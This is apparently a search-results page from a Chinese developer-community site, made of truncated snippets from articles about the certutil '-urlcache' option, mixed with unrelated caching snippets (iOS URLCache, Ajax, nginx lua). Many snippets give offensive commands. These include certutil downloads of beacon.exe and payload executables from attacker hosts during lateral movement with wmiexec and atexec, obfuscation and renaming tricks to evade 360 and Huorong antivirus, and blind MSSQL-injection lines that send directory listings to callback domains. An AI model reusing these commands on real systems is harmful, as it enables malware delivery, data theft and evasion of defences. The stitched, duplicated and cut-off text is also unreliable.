- 综合排序
- 最热优先
- 最新优先
- 来自专栏乌鸦安全
certutil工具使用和bypass学习
-urlcache * delete 此时缓存已经删除 如果想以后下载文件不想要缓存的话,可以在下载文件结尾加上一个delete certutil.exe -urlcache -split -f http 然后再使用命令将当前的文件下载过来: certutil.exe -urlcache -split -f http://192.168.22.104/1.txt certutil.exe -urlcache -urlcache -split -f http://192.168.22.102/2.txt certutil -urlcache -split -f http://192.168.22.102 -split -f http://192.168.22.102/cmd.exe 下面这个命令不杀: crow3 -urlcache 继续: crow3 -urlcache -split crow3 -urlcache -split -f crow3 -urlcache -split -f http: 很明显了,这里就开始杀了,要混淆才行。
4.2K20编辑于 2022-08-11 - 来自专栏Vue源码 & 前端进阶体系
【我爱设计模式】备忘录 - Ajax响应缓存
urlCache=CACHE[method] if(typeof urlCache[url] =="undefined") urlCache[url]= {} = CACHE[method][url] var dataCache= urlCache && urlCache[data] dataCache && delete urlCache urlCache=CACHE[method] if(typeof urlCache[url] =="undefined") urlCache[url]= {} urlCache[url][data] = backData }, // = CACHE[method][url] var dataCache= urlCache && urlCache[data]
77660发布于 2019-08-02 - 来自专栏Cyber Security
【内网安全】 横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/bindtcp-2222.exe @#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444 @#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444 @#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/webserver4444.exe & @#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444
71210编辑于 2024-07-18 - 来自专栏红蓝对抗
免杀学习-从指令绕过开始(2)
-URLCache 显示或删除URL缓存条目。 无值的命令行选项。 (certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。) 可以在命令后面加上 delete指令删除缓存 查看缓存 certutil -urlcache * 看个缓存360直接报错了,因此可以判断是否目前360对于certutil的防御策略中有一项是针对我们的 certutil的字符进行限制 执行删除缓存 certutil -urlcache * delete 绕过火绒 我们首先看看破晓中给我们的certutil的下载语句 certutil -urlcache pzxsnoqd pzxsnoqd.exe && pzxsnoqd.exe agent -u http://127.0.0.1:1338 -s e75tdmwe 我们首先看看下载语句 certutil -urlcache ^e^""x""^e 炸裂还是不行 给certutil换个路径和文件名(√) 更换 copy c:\windows\system32\certutil.exe c.exe 下载 a -urlcache
60720编辑于 2023-09-25 - 来自专栏红蓝对抗
免杀学习-从指令绕过开始(2)
-URLCache显示或删除URL缓存条目。无值的命令行选项。(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。) 可以在命令后面加上 delete指令删除缓存查看缓存certutil -urlcache *看个缓存360直接报错了,因此可以判断是否目前360对于certutil的防御策略中有一项是针对我们的certutil 的字符进行限制执行删除缓存certutil -urlcache * delete绕过火绒我们首先看看破晓中给我们的certutil的下载语句certutil -urlcache -gmt -split pzxsnoqd pzxsnoqd.exe && pzxsnoqd.exe agent -u http://127.0.0.1:1338 -s e75tdmwe我们首先看看下载语句certutil -urlcache ^e^""x""^e炸裂还是不行给certutil换个路径和文件名(√)更换copy c:\windows\system32\certutil.exe c.exe下载a -urlcache -split
52420编辑于 2023-11-04 - 来自专栏潇湘信安
记录一次从弱口令到远程登陆
Certutil: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content 下载文件: certutil -urlcache -split -f http://192.168.1.108/payload.exe C:\ProgramData\payload.exe certutil -urlcache -split -f http 192.168.1.108/base64.txt b64 & certutil -decode b64 C:\ProgramData\payload.exe & del b64 删除指定缓存: certutil -urlcache -split -f http://192.168.1.108/base64.txt delete 查看所有缓存: certutil -urlcache * 删除所有缓存: certutil -urlcache
1.3K30发布于 2020-12-25 - 来自专栏HACK学习
干货 | Certutil在渗透中的利用和详解
一般使用certutil下载文件的命令为 certutil -urlcache -split -f http://ip/artifact.exe 这里介绍一下参数 •-f 覆盖现有文件。 •-URLCache 显示或删除URL缓存条目。无值的命令行选项。(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。) 另外一种方法就是使用windows自带的分隔符&和|,本质上跟第一种方法一样,相当于执行了两次certutil certutil & certutil -urlcache -split -f http: //ip/artifact.execertutil | certutil -urlcache -split -f http://ip/artifact.exe ? 使用certutil下载文件有个弊端就是会产生缓存文件,用如下命令查看: certutil -urlcache * ? 执行删除缓存 certutil -urlcache * delete ?
7.1K61发布于 2021-07-21 - 来自专栏红队蓝军
干货 | Certutil在渗透中的利用和详解
一般使用certutil下载文件的命令为 certutil -urlcache -split -f http://ip/artifact.exe 这里介绍一下参数 •-f 覆盖现有文件。 •-URLCache 显示或删除URL缓存条目。无值的命令行选项。(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。) ,如果你觉得这个文件名太过于明显容易被管理员发现就可以在下载的时候使用自己设置的名字生成exe certutil & certutil -urlcache -split -f http://172.20.10.4 :8000/artifact.exe nice.exe 使用certutil下载文件有个弊端就是会产生缓存文件,用如下命令查看: certutil -urlcache * 执行删除缓存 certutil -urlcache * delete 这里如果嫌麻烦的话可以在下载文件的时候加上一个delete参数,这样就省去了后面再来清理缓存的麻烦 certutil & certutil -urlcache
2.7K21编辑于 2022-05-17 - 来自专栏betasec
Chatterbox(hack the box系列)
升级为meterpreter shell,此处是升级失败 msf suggest提权模块不能获取可以提权的模块使用提权脚本看一下 由于是windows 7,使用证书下载试试看 certutil.exe -urlcache -split -f http://10.10.14.61:8000/winPEAS.exe 1.exe certutil.exe -urlcache -split -f http://10.10.14.61 :8000/ms16-075.exe 2.exe certutil.exe -urlcache -split -f http://10.10.14.61:8000/41015.exe 3.exe .
69910发布于 2020-07-31 - 来自专栏开发三两事
halo+lua+nginx缓存实现毫秒级访问速度 - 乐享诚美
index index.html index.htm; # } #} } 3、lua缓存编写 local cjlcache = ngx.shared.my_cache local urlcache = ngx.var.request_uri; local cjltest = cjlcache:get(urlcache) if cjltest ~= "" and cjltest ~= nil then templates/test1.html https://holdall.cn"); local f = io.popen("curl http://119.45.255.46:8080" .. urlcache ) local context = f:read("*a") cjlcache:set(urlcache,context,600) ngx.say(context) end - ``` 粗暴的方法
41660编辑于 2023-10-18 - 来自专栏全栈工程师修炼之路
哈希生成与文件验证
-- 显示或删除注册策略缓存项目 -CredStore -- 显示、添加或删除凭据存储项目 -InstallDefaultTemplates -- 安装默认的证书模板 -URLCache #3.文件下载(保存指定名称) certutil -urlcache -split -f https://github.com/weblogic.py test.py certutil -urlcache -f https://github.com/weblogic.py #4.查看与清除缓存 certutil.exe -urlcache * #@清除下载文件副本方法 - 方法一:直接删除缓存目录对应文件 - 方法二,命令行:certutil -urlcache -f https://github.com/weblogic.py delete
2.1K32发布于 2020-10-26 - 来自专栏全栈工程师修炼之路
哈希生成与文件验证
-- 显示或删除注册策略缓存项目 -CredStore -- 显示、添加或删除凭据存储项目 -InstallDefaultTemplates -- 安装默认的证书模板 -URLCache #3.文件下载(保存指定名称) certutil -urlcache -split -f https://github.com/weblogic.py test.py certutil -urlcache -f https://github.com/weblogic.py #4.查看与清除缓存 certutil.exe -urlcache * #@清除下载文件副本方法 - 方法一:直接删除缓存目录对应文件 - 方法二,命令行:certutil -urlcache -f https://github.com/weblogic.py delete
2K20编辑于 2022-09-28 - 来自专栏潇湘信安
MSSQL注入之无回显利用实战案例
cmd+/c+certutil+-urlcache+-split+-f+http://pha2623wuxr6h68nfsnso7zpvg16pv.burpcollaborator.net 注:我们可以使用 curl http://******.ceye.io mshta http://******.ceye.io certutil -urlcache -split -f http://******.ceye.io 文件落地: cmd+/c+certutil+-urlcache+-split+-f+http://192.168.1.105:8888/beacon.exe+C:\windows\temp\beacon.exe 查看文件: for+/r+C:\+%i+in+(beacon.exe*)+do+certutil+-urlcache+-split+-f+http://******.ceye.io/%i 查看路径 : for+/F+%i+in+('dir+/b+c:\windows\temp\')+do+certutil+-urlcache+-split+-f+http://******.ceye.io/%i
3.5K10编辑于 2022-09-14 - 来自专栏开发三两事
halo+lua+nginx缓存实现毫秒级访问速度
index index.html index.htm; # } #} } 3、lua缓存编写 local cjlcache = ngx.shared.my_cache local urlcache = ngx.var.request_uri; local cjltest = cjlcache:get(urlcache) if cjltest ~= "" and cjltest ~= nil then templates/test1.html https://holdall.cn"); local f = io.popen("curl http://119.45.255.46:8080" .. urlcache ) local context = f:read("*a") cjlcache:set(urlcache,context,600) ngx.say(context) end - ``` 粗暴的方法
85521编辑于 2023-03-31 - 来自专栏Windows技术交流
云服务器上如何获取windows productkey
ProduKey.exe也可以命令行查看productkey,可以搞自动化代码 接下来运行代码 ≤2012R2 的系统,cmd,注意是cmd不是powershell,在cmd命令行来运行如下命令: certutil -urlcache -split -f http://www.nirsoft.net/utils/produkey-x64.zip "c:\produkey.zip" certutil -urlcache -split -f http://windows-1251783334.cos.ap-shanghai.myqcloud.com/7z1900-x64.msi "c:\7z1900.msi" certutil -urlcache ①因为certutil -urlcache -split -f 这种命令在≥server2016的系统上会默认被windows defender拦截,而invoke-webrequest 却不会被拦截。
10.8K20编辑于 2024-05-20 - 来自专栏学海无涯
iOS14开发-网络
{ if let error = error { print(error) } } } URLCache 网络缓存有很多好处:节省流量、更快加载 使用 URLCache 管理缓存区域的大小和数据。 每一个 App 都默认创建了一个 URLCache 作为缓存管理者,可以通过URLCache.shared获取,也可以自定义。 // 创建URLCache // memoryCapacity:内存缓存容量 // diskCapacity:硬盘缓存容量 // directory:硬盘缓存路径 let cache = URLCache directory: FileManager.default.urls(for: .documentDirectory, in: .userDomainMask).first) // 替换默认的缓存管理对象 URLCache.shared , cachePolicy: .returnCacheDataElseLoad, timeoutInterval: 5) let cache = URLCache.shared // 内存缓存大小 cache.memoryCapacity
3.3K30发布于 2021-06-24 - 来自专栏YX’blog
【免杀】certutil工具bypass杀软
-- 显示或删除注册策略缓存项目 -CredStore -- 显示、添加或删除凭据存储项目 -InstallDefaultTemplates -- 安装默认的证书模板 -URLCache Hash algorithms: MD2 MD4 MD5 SHA1 SHA256 SHA384 SHA512. certutil -hashfile 文件 hash类型 下载 Certutil.exe -urlcache Certutil.exe -urlcache * 如果不想生成缓存的话可以用 certutil & certutil -urlcache -split -f http://ip/xx.exe delete 可以发现这里直接bypass了最新版的火绒 copy C:\windows\system32\certutil.exe abc.txt abc.txt -urlcache -split -f http:
1.2K10编辑于 2024-05-26 - 来自专栏HelloCode开发者学习平台
Alamofire-URLSession必备技能
configuration2 = URLSessionConfiguration.ephemeral print("沙盒大小: \(String(describing: configuration1.urlCache diskCapacity))") print("内存大小: \(String(describing: configuration1.urlCache?. memoryCapacity))") print("沙盒大小: \(String(describing: configuration2.urlCache?. diskCapacity))") print("内存大小: \(String(describing: configuration2.urlCache?. 设置缓存策略 urlCache:用于向会话中的请求提供缓存响应的URL缓存 requestCachePolicy:一个预定义常量,用于确定何时从缓存中返回响应 6.
2.9K20编辑于 2023-03-23 - 来自专栏Cyber Security
【内网安全】 横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
(通过命令下载webserver以及准备好的木马) shell atexec.exe god/administrator:Admin12345@192.168.3.21 "certutil.exe -urlcache /administrator:'+mima+'@'+ip+' "certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c: \\atexec.py god/'+user+':'+mima+'@'+ip+' "certutil -urlcache -split -f http://192.168.3.31/webserver4444 @#45@192.168.3.32 "certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"' #这里是使用可执行程序 @#45@192.168.3.32 "certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"'
73510编辑于 2024-07-18 - 来自专栏全栈程序员必看
windows无exe
123.dll regsvr32 /u /s 123.dll sct 参考 https://github.com/GreatSCT/GreatSCT certutil.exe certuil.exe -urlcache http://www.baidu.com #无法绕过defender 编码 base64 payload.exe > /var/www/html/update.txt 解码执行 certutril -urlcache
1.9K21编辑于 2022-09-14
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号